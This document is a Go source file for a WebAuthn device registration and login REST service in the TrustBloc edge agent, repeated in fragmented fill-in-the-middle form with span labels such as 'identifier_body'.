err = o.requestDeviceValidation(r.Context(), userData.Sub, string(credential.Authenticator.AAGUID), deviceCerts)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to finish registration: %#v", err)
return
}
} else {
logger.Warnf("credential attestation of format '%s' has no certificates",
parsedResponse.Response.AttestationObject.Format)
}
device.AddCredential(*credential)
err = o.saveDeviceInfo(device)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save device info: %s", err.Error())
return
}
o.saveCookie(w, r, userData.Sub, deviceCookieName)
jsonResponse(w, credential, http.StatusOK)
logger.Debugf("Registration success")
}
func (o *Operation) requestDeviceValidation(ctx context.Context, userSub, aaguid string, certs []interface{}) error {
if len(certs) == 0 {
return fmt.Errorf("missing certs")
}
var certPemList []string
for _, certInterface := range certs {
cert, ok := certInterface.([]byte)
if !ok {
return fmt.Errorf("can't cast certificate data to []byte")
}
certPemList = append(certPemList, string(pem.EncodeToMemory(
&pem.Block{Bytes: cert, Type: "CERTIFICATE"},
)))
}
postData, err := json.Marshal(&struct {
X5c []string `json:"x5c"`
Sub string `json:"sub"`
Aaguid string `json:"aaguid"`
}{
X5c: certPemList,
Sub: userSub,
Aaguid: aaguid,
})
if err != nil {
return fmt.Errorf("failed to marshal cert data: %w", err)
}
req, err := http.NewRequestWithContext(ctx, http.MethodPost, o.hubAuthURL+"/device", bytes.NewBuffer(postData))
if err != nil {
return fmt.Errorf("failed to create request: %w", err)
}
_, _, err = common.SendHTTPRequest(req, o.httpClient, http.StatusOK, nil)
if err != nil {
return fmt.Errorf("failed response from hub-auth/device endpoint: %w", err)
}
return nil
}
func (o *Operation) beginLogin(w http.ResponseWriter, r *http.Request) {
logger.Debugf("handling begin device login: %s", r.URL.String())
// get username
userData, canProceed := o.getUserData(w, r, deviceCookieName)
if !canProceed {
return
}
deviceData, err := o.getDeviceInfo(userData.Sub)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to get device data: %s", err.Error())
return
}
// generate PublicKeyCredentialRequestOptions, session data
options, sessionData, err := o.webauthn.BeginLogin(deviceData)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to begin login: %s", err.Error())
return
}
// store session data as marshaled JSON
err = o.store.session.SaveWebauthnSession(deviceData.ID, sessionData, r, w)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save web auth login session: %s", err.Error())
return
}
logger.Debugf("Login begin success")
jsonResponse(w, options, http.StatusOK)
}
func (o *Operation) finishLogin(w http.ResponseWriter, r *http.Request) {
logger.Debugf("handling finish device login: %s", r.URL.String())
// get username
userData, canProceed := o.getUserData(w, r, deviceCookieName)
if !canProceed {
return
}
deviceData, err := o.getDeviceInfo(userData.Sub)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to get device data: %s", err.Error())
return
}
o.saveCookie(w, r, userData.Sub, userSubCookieName)
// load the session data
sessionData, err := o.store.session.GetWebauthnSession(deviceData.ID, r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to get web auth login session: %s", err.Error())
return
}
_, err = o.webauthn.FinishLogin(deviceData, sessionData, r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to finish login: %s", err.Error())
return
}
// handle successful login
http.Redirect(w, r, o.walletDashboard, http.StatusFound)
logger.Debugf("Login finish success")
}
func (o *Operation) getUserData(w http.ResponseWriter, r *http.Request, cookieName string) (userData *user.User,
proceed bool) {
cookieSession, err := o.store.cookies.Open(r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to create or decode session cookie: %s", err.Error())
return nil, false
}
userSub, found := cookieSession.Get(cookieName)
if !found {
common.WriteErrorResponsef(w, logger, http.StatusNotFound, "missing device user session cookie")
return nil, false
}
userData, err = o.store.users.Get(fmt.Sprintf("%v", userSub))
if err != nil |
displayName := strings.Split(fmt.Sprintf("%v", userSub), "@")[0]
userData.FamilyName = displayName
return userData, true
}
func (o *Operation) saveCookie(w http.ResponseWriter, r *http.Request, usr, cookieName string) {
logger.Debugf("device cookie begin %s", usr)
deviceSession, err := o.store.cookies.Open(r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to read user session cookie: %s", err.Error())
return
}
deviceSession.Set(cookieName, usr)
err = deviceSession.Save(r, w)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save device cookie: %s", err.Error())
return
}
}
func (o *Operation) saveDeviceInfo(device *Device) error {
deviceBytes, err := json.Marshal(device)
if err != nil {
return fmt.Errorf("failed to marshall the device data: %w", err)
}
err = o.store.storage.Put(device.ID, deviceBytes)
if err != nil {
return fmt.Errorf("failed to save the device data: %w", err)
}
return nil
}
func (o *Operation) getDeviceInfo(username string) (*Device, error) {
// fetch user and check if user doesn't exist
userData, err := o.store.users.Get(username)
if err != nil {
return nil, fmt.Errorf("failed to get user: %w", err)
}
deviceDataBytes, err := o.store.storage.Get(userData.Sub)
if err != nil {
return nil, fmt.Errorf("failed to fetch device data: %w", err)
}
deviceData := &Device{}
err = json.Unmarshal(deviceDataBytes, deviceData)
if err != nil {
return nil, fmt.Errorf("failed to unmarshall device data: %w", err)
}
return deviceData, nil
}
func jsonResponse(w http.ResponseWriter, resp interface{}, c int) {
respBytes, err := json.Marshal(resp)
if err != nil {
http.Error(w, "Error creating JSON response", http.StatusInternalServerError)
}
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(c)
fmt.Fprintf(w, "%s", respBytes)
}
| {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to get user data %s:", err.Error())
return nil, false
} | conditional_block |
operations.go | /*
Copyright SecureKey Technologies Inc. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
*/
package device
import (
"bytes"
"context"
"crypto/tls"
"encoding/json"
"encoding/pem"
"fmt"
"net/http"
"strings"
"github.com/duo-labs/webauthn.io/session"
"github.com/duo-labs/webauthn/protocol"
"github.com/duo-labs/webauthn/webauthn"
ariesstorage "github.com/hyperledger/aries-framework-go/spi/storage"
"github.com/trustbloc/edge-core/pkg/log"
"github.com/trustbloc/edge-agent/pkg/restapi/common"
"github.com/trustbloc/edge-agent/pkg/restapi/common/store"
"github.com/trustbloc/edge-agent/pkg/restapi/common/store/cookie"
"github.com/trustbloc/edge-agent/pkg/restapi/common/store/user"
)
// Endpoints.
const (
registerBeginPath = "/register/begin"
registerFinishPath = "/register/finish"
loginBeginPath = "/login/begin"
loginFinishPath = "/login/finish"
)
// Stores.
const (
deviceStoreName = "edgeagent_device_trx"
userSubCookieName = "user_sub"
deviceCookieName = "device_user"
)
var logger = log.New("edge-agent/device-registration")
// Config holds all configuration for an Operation.
type Config struct {
Storage *StorageConfig
WalletDashboard string
TLSConfig *tls.Config
Cookie *cookie.Config
Webauthn *webauthn.WebAuthn
HubAuthURL string
}
// StorageConfig holds storage config.
type StorageConfig struct {
Storage ariesstorage.Provider
SessionStore ariesstorage.Provider
}
type stores struct {
users *user.Store
cookies cookie.Store
storage ariesstorage.Store
session *session.Store
}
type httpClient interface {
Do(req *http.Request) (*http.Response, error)
}
// Operation implements OIDC operations.
type Operation struct {
store *stores
walletDashboard string
tlsConfig *tls.Config
httpClient httpClient
webauthn *webauthn.WebAuthn
hubAuthURL string
}
// New returns a new Operation.
func New(config *Config) (*Operation, error) {
op := &Operation{
store: &stores{
cookies: cookie.NewStore(config.Cookie),
},
tlsConfig: config.TLSConfig,
httpClient: &http.Client{Transport: &http.Transport{TLSClientConfig: config.TLSConfig}},
webauthn: config.Webauthn,
walletDashboard: config.WalletDashboard,
hubAuthURL: config.HubAuthURL,
}
var err error
protocol.RegisterAttestationFormat("apple", ValidateAppleAttestation)
op.store.storage, err = store.Open(config.Storage.Storage, deviceStoreName)
if err != nil {
return nil, fmt.Errorf("failed to open store: %w", err)
}
op.store.session, err = session.NewStore()
if err != nil {
return nil, fmt.Errorf("failed to create web auth protocol session store: %w", err)
}
op.store.users, err = user.NewStore(config.Storage.Storage)
if err != nil {
return nil, fmt.Errorf("failed to open users store: %w", err)
}
return op, nil
}
// GetRESTHandlers get all controller API handler available for this service.
func (o *Operation) GetRESTHandlers() []common.Handler {
return []common.Handler{
common.NewHTTPHandler(registerBeginPath, http.MethodGet, o.beginRegistration),
common.NewHTTPHandler(registerFinishPath, http.MethodPost, o.finishRegistration),
common.NewHTTPHandler(loginBeginPath, http.MethodGet, o.beginLogin),
common.NewHTTPHandler(loginFinishPath, http.MethodPost, o.finishLogin),
}
}
func (o *Operation) beginRegistration(w http.ResponseWriter, r *http.Request) {
logger.Debugf("handling device registration: %s", r.URL.String())
userData, canProceed := o.getUserData(w, r, userSubCookieName)
if !canProceed {
return
}
device := NewDevice(userData)
webAuthnUser := protocol.UserEntity{
ID: device.WebAuthnID(),
DisplayName: device.WebAuthnDisplayName(),
CredentialEntity: protocol.CredentialEntity{
Name: device.WebAuthnName(),
},
}
registerOptions := func(credCreationOpts *protocol.PublicKeyCredentialCreationOptions) {
credCreationOpts.User = webAuthnUser
credCreationOpts.CredentialExcludeList = device.CredentialExcludeList()
credCreationOpts.Attestation = protocol.PreferDirectAttestation
}
// generate PublicKeyCredentialCreationOptions, session data
credentialParams, sessionData, err := o.webauthn.BeginRegistration(
device,
registerOptions,
)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to begin registration %s", err.Error())
return
}
// store session data as marshaled JSON
err = o.store.session.SaveWebauthnSession(userData.Sub, sessionData, r, w)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save web auth session %s", err.Error())
return
}
jsonResponse(w, credentialParams, http.StatusOK)
logger.Debugf("Registration begins")
}
func (o *Operation) finishRegistration(w http.ResponseWriter, r *http.Request) { // nolint:funlen // not clean to split
logger.Debugf("handling finish device registration: %s", r.URL.String())
userData, canProceed := o.getUserData(w, r, userSubCookieName)
if !canProceed {
return
}
sessionData, err := o.store.session.GetWebauthnSession(userData.Sub, r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to get web auth session: %s", err.Error())
return
}
device := NewDevice(userData)
// unfold webauthn.FinishRegistration, to access parsedResponse
parsedResponse, err := protocol.ParseCredentialCreationResponse(r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to finish registration: parsing ccr: %#v", err)
return
}
credential, err := o.webauthn.CreateCredential(device, sessionData, parsedResponse)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to finish registration: cred: %#v", err)
return
}
deviceCerts, ok := parsedResponse.Response.AttestationObject.AttStatement["x5c"].([]interface{})
if ok && len(deviceCerts) > 0 {
err = o.requestDeviceValidation(r.Context(), userData.Sub, string(credential.Authenticator.AAGUID), deviceCerts)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to finish registration: %#v", err)
return
}
} else {
logger.Warnf("credential attestation of format '%s' has no certificates",
parsedResponse.Response.AttestationObject.Format)
}
device.AddCredential(*credential)
err = o.saveDeviceInfo(device)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save device info: %s", err.Error())
return
}
o.saveCookie(w, r, userData.Sub, deviceCookieName)
jsonResponse(w, credential, http.StatusOK)
logger.Debugf("Registration success")
}
func (o *Operation) requestDeviceValidation(ctx context.Context, userSub, aaguid string, certs []interface{}) error {
if len(certs) == 0 {
return fmt.Errorf("missing certs")
}
var certPemList []string
for _, certInterface := range certs {
cert, ok := certInterface.([]byte)
if !ok {
return fmt.Errorf("can't cast certificate data to []byte")
}
certPemList = append(certPemList, string(pem.EncodeToMemory(
&pem.Block{Bytes: cert, Type: "CERTIFICATE"},
)))
}
postData, err := json.Marshal(&struct {
X5c []string `json:"x5c"`
Sub string `json:"sub"`
Aaguid string `json:"aaguid"`
}{
X5c: certPemList,
Sub: userSub,
Aaguid: aaguid,
})
if err != nil {
return fmt.Errorf("failed to marshal cert data: %w", err)
}
req, err := http.NewRequestWithContext(ctx, http.MethodPost, o.hubAuthURL+"/device", bytes.NewBuffer(postData))
if err != nil {
return fmt.Errorf("failed to create request: %w", err)
}
_, _, err = common.SendHTTPRequest(req, o.httpClient, http.StatusOK, nil)
if err != nil {
return fmt.Errorf("failed response from hub-auth/device endpoint: %w", err)
}
return nil
}
func (o *Operation) beginLogin(w http.ResponseWriter, r *http.Request) {
logger.Debugf("handling begin device login: %s", r.URL.String())
// get username
userData, canProceed := o.getUserData(w, r, deviceCookieName)
if !canProceed {
return
}
deviceData, err := o.getDeviceInfo(userData.Sub)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to get device data: %s", err.Error())
return
}
// generate PublicKeyCredentialRequestOptions, session data
options, sessionData, err := o.webauthn.BeginLogin(deviceData)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to begin login: %s", err.Error())
return
}
// store session data as marshaled JSON
err = o.store.session.SaveWebauthnSession(deviceData.ID, sessionData, r, w)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save web auth login session: %s", err.Error())
return
}
logger.Debugf("Login begin success")
jsonResponse(w, options, http.StatusOK)
}
func (o *Operation) finishLogin(w http.ResponseWriter, r *http.Request) {
logger.Debugf("handling finish device login: %s", r.URL.String())
// get username
userData, canProceed := o.getUserData(w, r, deviceCookieName)
if !canProceed {
return
}
deviceData, err := o.getDeviceInfo(userData.Sub)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to get device data: %s", err.Error())
return
}
o.saveCookie(w, r, userData.Sub, userSubCookieName)
// load the session data
sessionData, err := o.store.session.GetWebauthnSession(deviceData.ID, r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to get web auth login session: %s", err.Error())
return
}
_, err = o.webauthn.FinishLogin(deviceData, sessionData, r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to finish login: %s", err.Error())
return
}
// handle successful login
http.Redirect(w, r, o.walletDashboard, http.StatusFound)
logger.Debugf("Login finish success")
}
func (o *Operation) getUserData(w http.ResponseWriter, r *http.Request, cookieName string) (userData *user.User,
proceed bool) {
cookieSession, err := o.store.cookies.Open(r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to create or decode session cookie: %s", err.Error())
return nil, false
}
userSub, found := cookieSession.Get(cookieName)
if !found {
common.WriteErrorResponsef(w, logger, http.StatusNotFound, "missing device user session cookie")
return nil, false
}
userData, err = o.store.users.Get(fmt.Sprintf("%v", userSub))
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to get user data %s:", err.Error())
return nil, false
}
displayName := strings.Split(fmt.Sprintf("%v", userSub), "@")[0]
userData.FamilyName = displayName
return userData, true
}
func (o *Operation) | (w http.ResponseWriter, r *http.Request, usr, cookieName string) {
logger.Debugf("device cookie begin %s", usr)
deviceSession, err := o.store.cookies.Open(r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to read user session cookie: %s", err.Error())
return
}
deviceSession.Set(cookieName, usr)
err = deviceSession.Save(r, w)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save device cookie: %s", err.Error())
return
}
}
func (o *Operation) saveDeviceInfo(device *Device) error {
deviceBytes, err := json.Marshal(device)
if err != nil {
return fmt.Errorf("failed to marshall the device data: %w", err)
}
err = o.store.storage.Put(device.ID, deviceBytes)
if err != nil {
return fmt.Errorf("failed to save the device data: %w", err)
}
return nil
}
func (o *Operation) getDeviceInfo(username string) (*Device, error) {
// fetch user and check if user doesn't exist
userData, err := o.store.users.Get(username)
if err != nil {
return nil, fmt.Errorf("failed to get user: %w", err)
}
deviceDataBytes, err := o.store.storage.Get(userData.Sub)
if err != nil {
return nil, fmt.Errorf("failed to fetch device data: %w", err)
}
deviceData := &Device{}
err = json.Unmarshal(deviceDataBytes, deviceData)
if err != nil {
return nil, fmt.Errorf("failed to unmarshall device data: %w", err)
}
return deviceData, nil
}
func jsonResponse(w http.ResponseWriter, resp interface{}, c int) {
respBytes, err := json.Marshal(resp)
if err != nil {
http.Error(w, "Error creating JSON response", http.StatusInternalServerError)
}
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(c)
fmt.Fprintf(w, "%s", respBytes)
}
| saveCookie | identifier_name |
operations.go | /*
Copyright SecureKey Technologies Inc. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
*/
package device
import (
"bytes"
"context"
"crypto/tls"
"encoding/json"
"encoding/pem"
"fmt"
"net/http"
"strings"
"github.com/duo-labs/webauthn.io/session"
"github.com/duo-labs/webauthn/protocol"
"github.com/duo-labs/webauthn/webauthn"
ariesstorage "github.com/hyperledger/aries-framework-go/spi/storage"
"github.com/trustbloc/edge-core/pkg/log"
"github.com/trustbloc/edge-agent/pkg/restapi/common"
"github.com/trustbloc/edge-agent/pkg/restapi/common/store"
"github.com/trustbloc/edge-agent/pkg/restapi/common/store/cookie"
"github.com/trustbloc/edge-agent/pkg/restapi/common/store/user"
)
// Endpoints.
const (
registerBeginPath = "/register/begin"
registerFinishPath = "/register/finish"
loginBeginPath = "/login/begin"
loginFinishPath = "/login/finish"
)
// Stores.
const (
deviceStoreName = "edgeagent_device_trx"
userSubCookieName = "user_sub"
deviceCookieName = "device_user"
)
var logger = log.New("edge-agent/device-registration")
// Config holds all configuration for an Operation.
type Config struct {
Storage *StorageConfig
WalletDashboard string
TLSConfig *tls.Config
Cookie *cookie.Config
Webauthn *webauthn.WebAuthn
HubAuthURL string
}
// StorageConfig holds storage config.
type StorageConfig struct {
Storage ariesstorage.Provider
SessionStore ariesstorage.Provider
}
type stores struct {
users *user.Store
cookies cookie.Store
storage ariesstorage.Store
session *session.Store
}
type httpClient interface {
Do(req *http.Request) (*http.Response, error)
}
// Operation implements OIDC operations.
type Operation struct {
store *stores
walletDashboard string
tlsConfig *tls.Config
httpClient httpClient
webauthn *webauthn.WebAuthn
hubAuthURL string
}
// New returns a new Operation.
func New(config *Config) (*Operation, error) |
// GetRESTHandlers get all controller API handler available for this service.
func (o *Operation) GetRESTHandlers() []common.Handler {
return []common.Handler{
common.NewHTTPHandler(registerBeginPath, http.MethodGet, o.beginRegistration),
common.NewHTTPHandler(registerFinishPath, http.MethodPost, o.finishRegistration),
common.NewHTTPHandler(loginBeginPath, http.MethodGet, o.beginLogin),
common.NewHTTPHandler(loginFinishPath, http.MethodPost, o.finishLogin),
}
}
func (o *Operation) beginRegistration(w http.ResponseWriter, r *http.Request) {
logger.Debugf("handling device registration: %s", r.URL.String())
userData, canProceed := o.getUserData(w, r, userSubCookieName)
if !canProceed {
return
}
device := NewDevice(userData)
webAuthnUser := protocol.UserEntity{
ID: device.WebAuthnID(),
DisplayName: device.WebAuthnDisplayName(),
CredentialEntity: protocol.CredentialEntity{
Name: device.WebAuthnName(),
},
}
registerOptions := func(credCreationOpts *protocol.PublicKeyCredentialCreationOptions) {
credCreationOpts.User = webAuthnUser
credCreationOpts.CredentialExcludeList = device.CredentialExcludeList()
credCreationOpts.Attestation = protocol.PreferDirectAttestation
}
// generate PublicKeyCredentialCreationOptions, session data
credentialParams, sessionData, err := o.webauthn.BeginRegistration(
device,
registerOptions,
)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to begin registration %s", err.Error())
return
}
// store session data as marshaled JSON
err = o.store.session.SaveWebauthnSession(userData.Sub, sessionData, r, w)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save web auth session %s", err.Error())
return
}
jsonResponse(w, credentialParams, http.StatusOK)
logger.Debugf("Registration begins")
}
func (o *Operation) finishRegistration(w http.ResponseWriter, r *http.Request) { // nolint:funlen // not clean to split
logger.Debugf("handling finish device registration: %s", r.URL.String())
userData, canProceed := o.getUserData(w, r, userSubCookieName)
if !canProceed {
return
}
sessionData, err := o.store.session.GetWebauthnSession(userData.Sub, r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to get web auth session: %s", err.Error())
return
}
device := NewDevice(userData)
// unfold webauthn.FinishRegistration, to access parsedResponse
parsedResponse, err := protocol.ParseCredentialCreationResponse(r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to finish registration: parsing ccr: %#v", err)
return
}
credential, err := o.webauthn.CreateCredential(device, sessionData, parsedResponse)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to finish registration: cred: %#v", err)
return
}
deviceCerts, ok := parsedResponse.Response.AttestationObject.AttStatement["x5c"].([]interface{})
if ok && len(deviceCerts) > 0 {
err = o.requestDeviceValidation(r.Context(), userData.Sub, string(credential.Authenticator.AAGUID), deviceCerts)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to finish registration: %#v", err)
return
}
} else {
logger.Warnf("credential attestation of format '%s' has no certificates",
parsedResponse.Response.AttestationObject.Format)
}
device.AddCredential(*credential)
err = o.saveDeviceInfo(device)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save device info: %s", err.Error())
return
}
o.saveCookie(w, r, userData.Sub, deviceCookieName)
jsonResponse(w, credential, http.StatusOK)
logger.Debugf("Registration success")
}
func (o *Operation) requestDeviceValidation(ctx context.Context, userSub, aaguid string, certs []interface{}) error {
if len(certs) == 0 {
return fmt.Errorf("missing certs")
}
var certPemList []string
for _, certInterface := range certs {
cert, ok := certInterface.([]byte)
if !ok {
return fmt.Errorf("can't cast certificate data to []byte")
}
certPemList = append(certPemList, string(pem.EncodeToMemory(
&pem.Block{Bytes: cert, Type: "CERTIFICATE"},
)))
}
postData, err := json.Marshal(&struct {
X5c []string `json:"x5c"`
Sub string `json:"sub"`
Aaguid string `json:"aaguid"`
}{
X5c: certPemList,
Sub: userSub,
Aaguid: aaguid,
})
if err != nil {
return fmt.Errorf("failed to marshal cert data: %w", err)
}
req, err := http.NewRequestWithContext(ctx, http.MethodPost, o.hubAuthURL+"/device", bytes.NewBuffer(postData))
if err != nil {
return fmt.Errorf("failed to create request: %w", err)
}
_, _, err = common.SendHTTPRequest(req, o.httpClient, http.StatusOK, nil)
if err != nil {
return fmt.Errorf("failed response from hub-auth/device endpoint: %w", err)
}
return nil
}
func (o *Operation) beginLogin(w http.ResponseWriter, r *http.Request) {
logger.Debugf("handling begin device login: %s", r.URL.String())
// get username
userData, canProceed := o.getUserData(w, r, deviceCookieName)
if !canProceed {
return
}
deviceData, err := o.getDeviceInfo(userData.Sub)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to get device data: %s", err.Error())
return
}
// generate PublicKeyCredentialRequestOptions, session data
options, sessionData, err := o.webauthn.BeginLogin(deviceData)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to begin login: %s", err.Error())
return
}
// store session data as marshaled JSON
err = o.store.session.SaveWebauthnSession(deviceData.ID, sessionData, r, w)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save web auth login session: %s", err.Error())
return
}
logger.Debugf("Login begin success")
jsonResponse(w, options, http.StatusOK)
}
func (o *Operation) finishLogin(w http.ResponseWriter, r *http.Request) {
logger.Debugf("handling finish device login: %s", r.URL.String())
// get username
userData, canProceed := o.getUserData(w, r, deviceCookieName)
if !canProceed {
return
}
deviceData, err := o.getDeviceInfo(userData.Sub)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to get device data: %s", err.Error())
return
}
o.saveCookie(w, r, userData.Sub, userSubCookieName)
// load the session data
sessionData, err := o.store.session.GetWebauthnSession(deviceData.ID, r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to get web auth login session: %s", err.Error())
return
}
_, err = o.webauthn.FinishLogin(deviceData, sessionData, r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to finish login: %s", err.Error())
return
}
// handle successful login
http.Redirect(w, r, o.walletDashboard, http.StatusFound)
logger.Debugf("Login finish success")
}
func (o *Operation) getUserData(w http.ResponseWriter, r *http.Request, cookieName string) (userData *user.User,
proceed bool) {
cookieSession, err := o.store.cookies.Open(r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to create or decode session cookie: %s", err.Error())
return nil, false
}
userSub, found := cookieSession.Get(cookieName)
if !found {
common.WriteErrorResponsef(w, logger, http.StatusNotFound, "missing device user session cookie")
return nil, false
}
userData, err = o.store.users.Get(fmt.Sprintf("%v", userSub))
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to get user data %s:", err.Error())
return nil, false
}
displayName := strings.Split(fmt.Sprintf("%v", userSub), "@")[0]
userData.FamilyName = displayName
return userData, true
}
func (o *Operation) saveCookie(w http.ResponseWriter, r *http.Request, usr, cookieName string) {
logger.Debugf("device cookie begin %s", usr)
deviceSession, err := o.store.cookies.Open(r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to read user session cookie: %s", err.Error())
return
}
deviceSession.Set(cookieName, usr)
err = deviceSession.Save(r, w)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save device cookie: %s", err.Error())
return
}
}
func (o *Operation) saveDeviceInfo(device *Device) error {
deviceBytes, err := json.Marshal(device)
if err != nil {
return fmt.Errorf("failed to marshall the device data: %w", err)
}
err = o.store.storage.Put(device.ID, deviceBytes)
if err != nil {
return fmt.Errorf("failed to save the device data: %w", err)
}
return nil
}
func (o *Operation) getDeviceInfo(username string) (*Device, error) {
// fetch user and check if user doesn't exist
userData, err := o.store.users.Get(username)
if err != nil {
return nil, fmt.Errorf("failed to get user: %w", err)
}
deviceDataBytes, err := o.store.storage.Get(userData.Sub)
if err != nil {
return nil, fmt.Errorf("failed to fetch device data: %w", err)
}
deviceData := &Device{}
err = json.Unmarshal(deviceDataBytes, deviceData)
if err != nil {
return nil, fmt.Errorf("failed to unmarshall device data: %w", err)
}
return deviceData, nil
}
func jsonResponse(w http.ResponseWriter, resp interface{}, c int) {
respBytes, err := json.Marshal(resp)
if err != nil {
http.Error(w, "Error creating JSON response", http.StatusInternalServerError)
}
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(c)
fmt.Fprintf(w, "%s", respBytes)
}
| {
op := &Operation{
store: &stores{
cookies: cookie.NewStore(config.Cookie),
},
tlsConfig: config.TLSConfig,
httpClient: &http.Client{Transport: &http.Transport{TLSClientConfig: config.TLSConfig}},
webauthn: config.Webauthn,
walletDashboard: config.WalletDashboard,
hubAuthURL: config.HubAuthURL,
}
var err error
protocol.RegisterAttestationFormat("apple", ValidateAppleAttestation)
op.store.storage, err = store.Open(config.Storage.Storage, deviceStoreName)
if err != nil {
return nil, fmt.Errorf("failed to open store: %w", err)
}
op.store.session, err = session.NewStore()
if err != nil {
return nil, fmt.Errorf("failed to create web auth protocol session store: %w", err)
}
op.store.users, err = user.NewStore(config.Storage.Storage)
if err != nil {
return nil, fmt.Errorf("failed to open users store: %w", err)
}
return op, nil
} | identifier_body |
operations.go | /*
Copyright SecureKey Technologies Inc. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
*/
package device
import (
"bytes"
"context"
"crypto/tls"
"encoding/json"
"encoding/pem"
"fmt"
"net/http"
"strings"
"github.com/duo-labs/webauthn.io/session"
"github.com/duo-labs/webauthn/protocol"
"github.com/duo-labs/webauthn/webauthn"
ariesstorage "github.com/hyperledger/aries-framework-go/spi/storage"
"github.com/trustbloc/edge-core/pkg/log"
"github.com/trustbloc/edge-agent/pkg/restapi/common"
"github.com/trustbloc/edge-agent/pkg/restapi/common/store"
"github.com/trustbloc/edge-agent/pkg/restapi/common/store/cookie"
"github.com/trustbloc/edge-agent/pkg/restapi/common/store/user"
)
// Endpoints.
const (
registerBeginPath = "/register/begin"
registerFinishPath = "/register/finish"
loginBeginPath = "/login/begin"
loginFinishPath = "/login/finish"
)
// Stores.
const (
deviceStoreName = "edgeagent_device_trx"
userSubCookieName = "user_sub"
deviceCookieName = "device_user"
)
var logger = log.New("edge-agent/device-registration")
// Config holds all configuration for an Operation.
type Config struct {
Storage *StorageConfig
WalletDashboard string
TLSConfig *tls.Config
Cookie *cookie.Config
Webauthn *webauthn.WebAuthn
HubAuthURL string
}
// StorageConfig holds storage config.
type StorageConfig struct {
Storage ariesstorage.Provider
SessionStore ariesstorage.Provider
}
type stores struct {
users *user.Store
cookies cookie.Store
storage ariesstorage.Store
session *session.Store
}
type httpClient interface {
Do(req *http.Request) (*http.Response, error)
}
// Operation implements OIDC operations.
type Operation struct {
store *stores
walletDashboard string
tlsConfig *tls.Config
httpClient httpClient
webauthn *webauthn.WebAuthn
hubAuthURL string
}
// New returns a new Operation.
func New(config *Config) (*Operation, error) {
op := &Operation{
store: &stores{
cookies: cookie.NewStore(config.Cookie),
},
tlsConfig: config.TLSConfig,
httpClient: &http.Client{Transport: &http.Transport{TLSClientConfig: config.TLSConfig}},
webauthn: config.Webauthn,
walletDashboard: config.WalletDashboard,
hubAuthURL: config.HubAuthURL,
}
var err error
protocol.RegisterAttestationFormat("apple", ValidateAppleAttestation)
op.store.storage, err = store.Open(config.Storage.Storage, deviceStoreName)
if err != nil {
return nil, fmt.Errorf("failed to open store: %w", err)
}
op.store.session, err = session.NewStore()
if err != nil {
return nil, fmt.Errorf("failed to create web auth protocol session store: %w", err)
}
